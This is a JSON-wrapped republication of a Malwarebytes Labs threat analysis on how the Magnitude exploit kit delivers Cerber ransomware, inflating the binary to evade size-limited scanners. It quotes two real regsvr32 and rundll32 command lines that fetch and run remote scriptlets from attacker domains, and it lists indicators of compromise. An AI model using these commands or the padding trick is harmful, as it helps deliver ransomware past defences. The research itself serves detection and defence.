{"id":8656,"date":"2017-08-09T09:10:10","date_gmt":"2017-08-09T17:10:10","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/09\/news-2429\/"},"modified":"2017-08-09T09:10:10","modified_gmt":"2017-08-09T17:10:10","slug":"news-2429","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/09\/news-2429\/","title":{"rendered":"Cerber ransomware delivered in format of a different order of Magnitude"},"content":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Wed, 09 Aug 2017 15:54:54 +0000<\/strong><\/p>\n<p>As a follow up to our study into the Magnitude exploit kit and its gate (which we profiled in a <a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/08\/enemy-at-the-gates-reviewing-the-magnitude-exploit-kit-redirection-chain\/\" target=\"_blank\" rel=\"noopener\">previous blog post<\/a>), we take a look at an interesting technique used to distribute the Cerber ransomware.<\/p>\n<p>Exploit kits are a very effective means of serving malicious payloads and an important aspect is the delivery mechanism in itself. The typical scenario is for the exploit code to download a payload to disk and then run it. 
But there are exceptions which we have witnessed in the past:<\/p>\n<ul>\n<li>a single encrypted payload is downloaded and then split into two different binaries on disk (ref:\u00a0<a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2013\/04\/redkit-exploit-kit-does-the-splits\/\" target=\"_blank\" rel=\"noopener\">Redkit exploit kit does the splits<\/a>)<\/li>\n<li>payload is downloaded straight into memory, without touching the disk AKA fileless (ref:\u00a0<a href=\"http:\/\/malware.dontneedcoffee.com\/2014\/08\/angler-ek-now-capable-of-fileless.html\" target=\"_blank\" rel=\"noopener\">Angler EK : now capable of &#8220;fileless&#8221; infection<\/a>)<\/li>\n<\/ul>\n<p>There may be different motivations behind such deviations from the standard drive-by download methodology, but typically the goal is to evade antivirus scanners\/signatures by adopting a less common behaviour.<\/p>\n<p>Today, we take a look at yet another technique which has been used by Magnitude EK where the payload is largely inflated before it is run.<\/p>\n<h2>Overview<\/h2>\n<p>The Magnitude exploit kit has been using an XML configuration file critical to retrieving the malware payload (Cerber) for several months already, and some researchers have run into it before [1] [2] [3].<\/p>\n<p>Around the end of July &#8211; according to our captures &#8211; we spotted a new\u00a0<em>for loop<\/em>\u00a0which assigns a variable that is being concatenated. 
This piece of code adds &#8216;junk&#8217; to the existing Cerber binary on the fly, to grow its initial size from, say, 245 KB* to anywhere between 70 and 100 MB*.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19194 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber.png\" alt=\"\" width=\"640\" height=\"382\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber.png 640w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber-300x179.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber-600x358.png 600w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 1: Workflow from Magnitude EK to Cerber infection via larger malicious binary<\/em><\/p>\n<p><em>* these numbers are from a specific capture and will vary based on changes made to Magnitude EK<\/em><\/p>\n<p>This is not a bug, but rather, as they say, &#8220;a feature&#8221; which allows it to bypass security products that have a hard limit on the file sizes they can scan. In the rest of this post, we will describe how this process, known as binary padding, is implemented in Magnitude EK.<\/p>\n<h2>Delivery chain<\/h2>\n<p>Magnitude EK is notorious for distributing the Cerber ransomware specifically to certain geolocations, and in particular South Korea, via its own gate, called <a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/08\/enemy-at-the-gates-reviewing-the-magnitude-exploit-kit-redirection-chain\/\" target=\"_blank\" rel=\"noopener\">Magnigate<\/a>. 
For a while, we have noticed that Magnitude EK has been using Internet Explorer vulnerabilities without necessarily resorting to Flash exploits.\u00a0Another interesting artifact in the EK flow is the use of an XML configuration file which contains JScript code.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow.png\" data-rel=\"lightbox-1\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19195 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow.png\" alt=\"\" width=\"821\" height=\"917\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow.png 821w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow-269x300.png 269w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow-537x600.png 537w\" sizes=\"auto, (max-width: 821px) 100vw, 821px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 2: Network traffic view showing the EK&#8217;s main artifacts<\/em><\/p>\n<h2>XML Configuration<\/h2>\n<p>In prior instances of Magnitude EK, <em>regsvr32.exe<\/em> was used to retrieve and execute the binary payload (without any size modification) using the scriptlet passed as a URL parameter. 
Originally, we saw the payload being launched from the %temp% folder, but sometime in mid-July it also ran from the Desktop (perhaps a transition?):<\/p>\n<p><em>&#8220;C:\\Windows\\System32\\regsvr32.exe&#8221; scrobj.dll \/s \/u \/n \/i:http:\/\/e6cgbdc11cx350s4.lessnot.men\/f62241e72664fd04fed6f79656757d9d.sct<\/em><\/p>\n<p>On July 31st, we noticed <em>rundll32.exe<\/em>\u00a0with a different-looking command still parsing the remote scriptlet:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19220 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/rundll32.png\" alt=\"\" width=\"591\" height=\"171\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/rundll32.png 591w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/rundll32-300x87.png 300w\" sizes=\"auto, (max-width: 591px) 100vw, 591px\" \/><\/p>\n<p style=\"text-align: center\"><em>Figure 3: From browser exploit to malicious JScript via rundll32<\/em><\/p>\n<p><em>&#8220;C:\\Windows\\System32\\rundll32.exe&#8221; <strong>javascript<\/strong>:&#8221;\\..\\mshtml,<span style=\"color: #ff0000\">RunHTMLApplication<\/span> &#8220;;document.write();GetObject(&#8216;script:<span style=\"color: #0000ff\">http:\/\/7fm0cd7d16w37.noneno.space\/4a44e2019f2e77c83f55c5c223bf10a0<\/span>&#8216;);<\/em><\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML.png\" data-rel=\"lightbox-2\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19221 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML.png\" alt=\"\" width=\"686\" height=\"687\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML.png 686w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML-150x150.png 150w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML-300x300.png 300w, 
https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML-600x600.png 600w\" sizes=\"auto, (max-width: 686px) 100vw, 686px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 4: The XML config, showing the embedded JScript<\/em><\/p>\n<h2>Binary padding<\/h2>\n<p>The purpose of this script is to retrieve the original Cerber payload (245 KB) and add data (95 MB) to it via a technique known as <a href=\"https:\/\/attack.mitre.org\/wiki\/Technique\/T1009\" target=\"_blank\" rel=\"noopener\">binary padding<\/a>. The Shell application uses ADODB.Stream to save &#8220;text&#8221; data (<em>N4mQj8624F9Npw10s61F<\/em>) with a particular charset (<em>iso-8859-1<\/em>), which handles the text-to-binary conversion.<\/p>\n<p>The reason this data amounts to 95 MB is that a loop triples the string on each of its 14 iterations, which is the equivalent of writing &#8220;<em>N4mQj8624F9Npw10s61F<\/em>&#8221; (20 bytes) 4,782,969 times (3^14) and saving the result to a file.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat.png\" data-rel=\"lightbox-3\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19222 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat.png\" alt=\"\" width=\"907\" height=\"312\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat.png 907w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat-300x103.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat-600x206.png 600w\" sizes=\"auto, (max-width: 907px) 100vw, 907px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 5: Crafting the inflated binary by appending a text string millions of times<\/em><\/p>\n<p><em>rundll32.exe<\/em> downloads the original Cerber and adds the junk data on the fly:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize.png\" data-rel=\"lightbox-4\" 
title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19227 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize.png\" alt=\"\" width=\"769\" height=\"447\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize.png 769w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize-300x174.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize-600x349.png 600w\" sizes=\"auto, (max-width: 769px) 100vw, 769px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 6: Process view showing data being written to the new, inflated Cerber binary<\/em><\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber.png\" data-rel=\"lightbox-5\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19228 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber.png\" alt=\"\" width=\"676\" height=\"1001\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber.png 676w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber-203x300.png 203w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber-405x600.png 405w\" sizes=\"auto, (max-width: 676px) 100vw, 676px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 7: Hexadecimal view of the final binary, showing the added &#8216;junk&#8217; data<\/em><\/p>\n<p>Finally, it runs it:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run.png\" data-rel=\"lightbox-6\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19229 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run.png\" alt=\"\" width=\"703\" height=\"88\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run.png 703w, 
https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run-300x38.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run-600x75.png 600w\" sizes=\"auto, (max-width: 703px) 100vw, 703px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 8: The new Cerber binary is invoked via rundll32<\/em><\/p>\n<p>A few seconds later, Cerber has encrypted files and displays the ransom note:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption.png\" data-rel=\"lightbox-7\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19234 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption.png\" alt=\"\" width=\"812\" height=\"547\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption.png 812w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption-300x202.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption-600x404.png 600w\" sizes=\"auto, (max-width: 812px) 100vw, 812px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 9: Wallpaper hijack shows the ransom note<\/em><\/p>\n<h2>Tricks of the trade<\/h2>\n<p>While Magnitude EK has a very narrow distribution channel, it remains an interesting exploit kit because not only does it have its own <a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/08\/enemy-at-the-gates-reviewing-the-magnitude-exploit-kit-redirection-chain\/\" target=\"_blank\" rel=\"noopener\">gate<\/a>, but it also continues to evolve with various tricks. The binary padding technique shows an effort to bypass certain security scanners that will ignore files above a certain size. 
However, this does not prevent the malicious binary (no matter how big) from running its course and fully infecting a machine.<\/p>\n<h2>Protection<\/h2>\n<p>The key to protecting against these kinds of attacks is to block threats regardless of the shape they come in and thwart them as early as possible in the delivery chain. Malwarebytes stops Magnitude EK proactively using its anti-exploit module <em>before<\/em> the malicious payload is even downloaded. As an added protection layer, our anti-ransomware component also stops this &#8216;larger than usual&#8217; Cerber.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block.png\" data-rel=\"lightbox-8\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19235 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block.png\" alt=\"\" width=\"799\" height=\"337\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block.png 799w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block-300x127.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block-600x253.png 600w\" sizes=\"auto, (max-width: 799px) 100vw, 799px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 10: Malwarebytes blocking the Magnitude exploit kit in its drive-by download attempt<\/em><\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block.png\" data-rel=\"lightbox-9\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19236 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block.png\" alt=\"\" width=\"799\" height=\"338\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block.png 799w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block-300x127.png 300w, 
https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block-600x254.png 600w\" sizes=\"auto, (max-width: 799px) 100vw, 799px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 11: Malwarebytes (other protection modules disabled for testing) stopping the ransomware infection<\/em><\/p>\n<h2>References<\/h2>\n<p>[1]\u00a0<a href=\"https:\/\/pcsxcetrasupport3.wordpress.com\/2017\/04\/24\/a-look-at-the-magnitude-exploit-kit-encoding\/\" target=\"_blank\" rel=\"noopener\">https:\/\/pcsxcetrasupport3.wordpress.com\/2017\/04\/24\/a-look-at-the-magnitude-exploit-kit-encoding\/<\/a><\/p>\n<p>[2]\u00a0<a href=\"https:\/\/www.zscaler.com\/blogs\/research\/wonder-woman-piracy-and-cerber-ransomware\" target=\"_blank\" rel=\"noopener\">https:\/\/www.zscaler.com\/blogs\/research\/wonder-woman-piracy-and-cerber-ransomware<\/a><\/p>\n<p>[3]\u00a0<a href=\"https:\/\/zerophagemalware.com\/2017\/08\/01\/magnitude-ek-xml-package-and-changes\/\" target=\"_blank\" rel=\"noopener\">https:\/\/zerophagemalware.com\/2017\/08\/01\/magnitude-ek-xml-package-and-changes\/<\/a><\/p>\n<h2>Indicators of compromise<\/h2>\n<p><strong>Magnitude EK<\/strong><\/p>\n<pre>217.182.227.103,spinner-art.org,Magnigate (step 1)  151.80.246.147,511bcl9645285d2w.himlead.com,Magnigate (step 2)  51.254.229.220,7fm0cd7d16w37.noneno.space,Magnitude EK Landing  51.254.229.220,7fm0cd7d16w37.noneno.space,Magnitude XML\/JScript  51.254.229.220,7fm0cd7d16w37.noneno.space,Cerber (original)<\/pre>\n<p><strong>Cerber (original)<\/strong><\/p>\n<pre>4bdd366d8ee35503cf062ae22abe5a4a2d8d8907  <a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original.png\" data-rel=\"lightbox-10\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19237\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original.png\" alt=\"\" width=\"784\" height=\"444\" 
srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original.png 784w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original-300x170.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original-600x340.png 600w\" sizes=\"auto, (max-width: 784px) 100vw, 784px\" \/><\/a><\/pre>\n<p><strong>Cerber (inflated)<\/strong><\/p>\n<pre>3da8e94c6d1efe2a039f49a1e748df5eef01af5a  <a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated.png\" data-rel=\"lightbox-11\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19238\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated.png\" alt=\"\" width=\"785\" height=\"441\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated.png 785w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated-300x169.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated-600x337.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated-400x225.png 400w\" sizes=\"auto, (max-width: 785px) 100vw, 785px\" \/><\/a><\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/\">Cerber ransomware delivered in format of a different order of Magnitude<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Wed, 09 Aug 2017 15:54:54 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a 
href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/' title='Cerber ransomware delivered in format of a different order of Magnitude'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Untitled-design-1.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>We review a trick that the Magnitude exploit kit uses to bypass security scanners.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/exploits-threat-analysis\/\" rel=\"category tag\">Exploits<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/binary-padding\/\" rel=\"tag\">binary padding<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/cerber\/\" rel=\"tag\">cerber<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/exploit-kit\/\" rel=\"tag\">exploit kit<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/gate\/\" rel=\"tag\">gate<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/magnigate\/\" rel=\"tag\">Magnigate<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/magnitude-ek\/\" rel=\"tag\">magnitude EK<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/ransomware\/\" rel=\"tag\">ransomware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/xml\/\" rel=\"tag\">XML<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/' title='Cerber ransomware delivered in format of a different order of Magnitude'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" 
href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/\">Cerber ransomware delivered in format of a different order of Magnitude<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[13487,10905,10534,10987,13488,13278,13489,3765,10494,13072],"class_list":["post-8656","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-binary-padding","tag-cerber","tag-exploit-kit","tag-exploits","tag-gate","tag-magnigate","tag-magnitude-ek","tag-ransomware","tag-threat-analysis","tag-xml"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8656"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8656\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8656"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8656"}],"curies":[{"name":"wp","href":"https
:\/\/api.w.org\/{rel}","templated":true}]}}